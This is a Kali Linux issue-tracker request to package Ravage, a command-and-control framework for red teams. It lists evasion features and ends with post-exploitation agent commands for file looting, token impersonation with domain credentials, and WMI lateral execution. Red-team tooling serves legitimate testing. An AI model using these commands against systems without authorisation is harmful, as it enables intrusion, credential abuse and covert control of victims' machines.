View Issue Details

ID: 0009557
Project: Kali Linux
Category: New Tool Requests
View Status: public
Last Update: 2026-02-20 12:41
Reporter: triagge
Assigned To:
Priority: normal
Severity: minor
Reproducibility: have not tried
Status: new
Resolution: open
Summary: 0009557: Ravage Framework, a powerful and malleable C2 framework designed for offensive security teams.
Description

[Name]
Ravage Framework

[Version]
1.2 — tagged as v1.2 at https://github.com/XPSec-Security/Ravage/releases/tag/v1.2

[Homepage]
https://github.com/XPSec-Security/Ravage

[Download]
https://github.com/XPSec-Security/Ravage/archive/refs/tags/v1.2.tar.gz

[Author]
XPSec Security

[Licence]
GNU General Public License v3.0 (GPL-3.0)

[Description]
Ravage is a Command & Control (C2) framework designed for cybersecurity professionals, red teams, and penetration testers. It provides a modular architecture with a web-based operator dashboard, dynamic listener management, AES-256 encrypted agent communications over SSL/TLS, multi-layer PowerShell obfuscation, traffic profile masquerading (mimicking CDN, YouTube, Teams traffic), and in-memory execution to minimise forensic footprint. Agents support file operations, process management, lateral movement (SMB/WMI exec, token impersonation), screenshots, and interactive shell execution.

[Dependencies]
Python 3.8+
OpenSSL (for SSL certificate generation)
Python packages: flask, pyyaml, cryptography

[Similar tools]
Cobalt Strike, Havoc, Sliver, Metasploit Framework, PowerShell Empire, Covenant, Villain, Merlin

[Activity]
Project started September 2025. Actively maintained — version 1.2 released February 2026.

[How to install]

Download release tarball

wget https://github.com/XPSec-Security/Ravage/archive/refs/tags/v1.2.tar.gz
tar -xzf v1.2.tar.gz && cd Ravage-1.2

Create virtual environment and install dependencies

python3 -m venv venv && source venv/bin/activate
pip install -r requirements.txt

Generate SSL certificates

mkdir certs
openssl req -x509 -newkey rsa:4096 -keyout certs/server.key -out certs/server.crt -days 365 -nodes

Configure and launch

cp profiles/profile.yaml.example profiles/profile.yaml
python main.py

[How to use]

Start the framework (admin panel available at https://localhost:2053)

python main.py

From the web dashboard, create a listener and generate an agent dropper.

Once an agent checks in, open an interactive session and run commands:

shell whoami
shell Get-WmiObject Win32_OperatingSystem
screenshot
plist
upload C:\Users\victim\loot.txt
list C:\Users\Administrator\Desktop
make_token DOMAIN\User:Password
wmi_exec TARGET "whoami"

[Packaged]
No

Attached Files
img_01.png (289,634 bytes)
img_02.png (164,291 bytes)   

Activities

Issue History

Date Modified Username Field Change
2026-02-20 12:41 triagge New Issue
2026-02-20 12:41 triagge File Added: img_01.png
2026-02-20 12:41 triagge File Added: img_02.png